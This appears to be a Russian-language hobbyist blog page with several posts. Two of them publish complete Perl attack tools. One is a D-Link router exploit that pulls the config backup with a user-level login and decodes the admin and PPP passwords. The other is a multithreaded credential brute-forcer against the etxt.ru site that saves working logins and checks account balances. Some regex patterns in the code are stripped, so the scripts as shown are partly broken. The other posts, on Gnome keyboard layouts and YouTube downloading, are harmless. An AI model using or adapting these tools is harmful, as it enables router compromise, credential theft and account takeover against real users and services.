Эксплойт юзает багу, которая позволяет слить сонфиг файл из под учётки юзера, и от туда достать нужную инфу, на пример такую как пасс админа.
За мой инглишь сильно не пинать icon smile Dlink exploit
В сплойт заложил ещё пару полезных мелочей, таких как возможность слить все акки с роутера и слить настройки всех соединений.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#!/usr/bin/perl -w

###
use strict;
use LWP::UserAgent;
use MIME::Base64;
use Getopt::Std;
###

help() if (scalar(@ARGV) == 0);

my %opt=();
getopt("lpat",\%opt);

help() if ($opt{h});

DEF:

my $adress = $opt{a} || '192.168.1.1';
my $login = $opt{l} || 'user';
my $pass = $opt{p} || 'user';
$opt{t} = 1 unless ($opt{t});

my $session = encode_base64($login.':'.$pass);

my $ua = LWP::UserAgent->new;
$ua->agent('Exploit agent 1.0.0');

my $conf = $ua->get('http://'.$adress.'/backupsettings.conf', 'Authorization' => 'Basic '.$session)->content;

if ($opt{t} == 1) {
    print "Printing xml file:\n". '==' x 20 ."\n".$conf."\n". '==' x 20 ."\n";
}

if ($opt{t} == 2) {
    my ($syspass) = ($conf) =~ m##;
    my ($sptpass) = ($conf) =~ m##;
    my ($usrpass) = ($conf) =~ m##;
   
    $syspass = decode_base64($syspass);
    $sptpass = decode_base64($sptpass);
    $usrpass = decode_base64($usrpass);
   
    print "admin:".$syspass."\nsupport:".$sptpass."\nuser:".$usrpass."\n";
}

if ($opt{t} == 3) {
    my (@id) = ($conf) =~ m#
    my (@name) = ($conf) =~ m#
    my (@pass) = ($conf) =~ m#
    print "Cet information form ppp connections:\n". '==' x 30 ."\n";
    while (1) {
        my $id = shift @id or last;
        print "ID:".$id."\n";
        my $name = shift @name or last;
        print "Login:".$name."\n";
        my $pass = shift @pass or last;
        $pass = decode_base64($pass);
        print "Pass:".$pass."\n";
    }
    print  '==' x 30 ."\n";
}

if ($opt{t} == 4) {
        open(F, '> backupsettings.conf');
    print F $conf."\n";
    close(F);
}


sub help {
    print "
###################################################
### DLink router exploit            ###
### Author: SHok aka mr. Lex        ###
### Official site: http://nig.org.ua/   ###
### Licens: GPL v3              ###
###################################################

-h - this help message
-l - user login
-p - user pass
-a - server adres
-t tipe atak [1, 2, 3, 4]

1 - get xml config file
2 - get all accaunts
3 - get all ppp connection information
4 - save xml config from hard disc

"
;exit;
}

tt twitter big4 Dlink exploit tt digg big4 Dlink exploit tt facebook big4 Dlink exploit tt gmail big4 Dlink exploit tt myspace big4 Dlink exploit tt reddit big4 Dlink exploit

Брутфорс сайта etxt.ru
[+] Многопоточноcть
[+] Сохранение бедов (опционально)
[+] Чек баланса (опционально)

Собственно говоря вот и код:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
#!/usr/bin/perl -w
######
# Author: SHok aka mr. Lex
# Licens: GPL v3
# Officiall site: http://nig.org.ua
######
use strict;
use LWP::UserAgent;
use Fcntl ':flock';
use threads;
use threads::shared;
###
$| = 1;
##########################Config##################################
my $logins = 'logins.txt';  # Файл с логинами
my $pass = 'pass.txt';      # Файл с паролями
my $split = ';';        # Разделитель
my $threads = 20;           # Кол-во потоков
my $good = 'good.txt';      # Файл с гудами
my $bad =  'bad.txt';       # Файл с бэдами
my $balans = 1;         # Проверять баланс 1 - да, 0 - нет
##################################################################
print "[i] Read logins and pass ...\n";
open (ACCS, $logins) or die "Cen't open file ".$logins." [ ".$!." ]\n";
chomp(my @logins : shared  = );
close(ACCS);
print "[+] Logins loaded.\n";
open (ACCS, $pass) or die "Cen't open file ".$pass." [ ".$!." ]\n";
chomp(my @pass = );
close(ACCS);
print "[+] Passwords loaded.\n";
print "[i] Starting threads ...\n";
threads->new(\&main) for 1 .. $threads;
$_->join for threads->list;
print "[i] Process finished.\n";
sub main {
    my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko)');
    $ua->cookie_jar({});
    while (my $login = shift @logins) {
        for (@pass) {
            my $sesion = login($ua, $login, $_);
            if ($sesion) {
                unless ($balans) {
                    print '[Good] ['.$login.$split.$_."]\n";
                    wf($good, $login.$split.$_."\n");
                } else {
                    my $b = get_balans($ua, $sesion);
                    print '[Good] ['.$login.$split.$_."]    [Balans: ".$b."]\n";
                    wf($good, $login.$split.$_."    [Balans: ".$b."]\n");
                }
                last;
            } else {
                print '[Bad]  ['.$login.$split.$_."]\n";
                wf($bad, $login.$split.$_."\n") if ($bad);
            }
        }
        $ua->cookie_jar->clear();
    }
}

sub login {
    my ($ua, $login, $pass) = @_;
    chomp($login, $pass);
   
    my $answ = $ua->post('https://www.etxt.ru/?enter=1',
        {
        login => $login,
        password => $pass,
        })->as_string;
   
    if ($answ =~ m#Location: admin\.php\?sid=(\w{32})#) {
        #wf('index.html', $answ);
        return $1;
    } else {
        return undef;
    }
}

sub get_balans {
    my $ua = shift;
    my $session = shift;
    my $data = $ua->get('https://www.etxt.ru/admin.php?sid='.$session)->content;
    #wf('index2.html', $data);
    my ($b) = ($data) =~ m#(.*?)#i;
    return $b;
}

sub wf
{
    open my $dat, '>>', $_[0] or die "\nCould not open $_[0] file!\n";
    flock $dat, LOCK_EX;
    print $dat $_[1];
    flock $dat, LOCK_UN;
    close $dat;
}

tt twitter big4 Брут сайта etxt.ru tt digg big4 Брут сайта etxt.ru tt facebook big4 Брут сайта etxt.ru tt gmail big4 Брут сайта etxt.ru tt myspace big4 Брут сайта etxt.ru tt reddit big4 Брут сайта etxt.ru

И так, этот пост посвящён раскладке клавиатуры, а точнее её украшению icon smile Красивая раскладка клавиатуры в Gnome
Сегодня ми заменим скушные надписи Рус, Укр, США, на
[РАНЬШЕ ТУТ БЫЛИ КАРТИНКИ. ПОТОМ ИХ ПОУДАЛЯЛИ]

И так поехали icon smile Красивая раскладка клавиатуры в Gnome
Прочитать остальную часть записи »

tt twitter big4 Красивая раскладка клавиатуры в Gnome tt digg big4 Красивая раскладка клавиатуры в Gnome tt facebook big4 Красивая раскладка клавиатуры в Gnome tt gmail big4 Красивая раскладка клавиатуры в Gnome tt myspace big4 Красивая раскладка клавиатуры в Gnome tt reddit big4 Красивая раскладка клавиатуры в Gnome

Здесь я решил опубликовать свои кривые, и возможно некому ненужные парсеры.
Хотя вполне возможно что кому то они будут полезны.
И так начнём!

1) Загрузка всех видео с одного канала на youtube
Требует установленной утилиты youtube-dl.
Установка в [Ubuntu\Debian]:

1
2
sudo -s
aptitude install youtube-dl

После чего запускаем скрипт, передавая в качестве параметра ссылку на канал youtube:

1
2
chmod 0777 parser.pl
./parser.pl "http://www.youtube.com/user/ThisIsHorosho"

Прочитать остальную часть записи »

tt twitter big4 Мои безделушки на Perl tt digg big4 Мои безделушки на Perl tt facebook big4 Мои безделушки на Perl tt gmail big4 Мои безделушки на Perl tt myspace big4 Мои безделушки на Perl tt reddit big4 Мои безделушки на Perl

RSS-подписка NIG Twitter-подписка NIG

Метки
Супер Pixel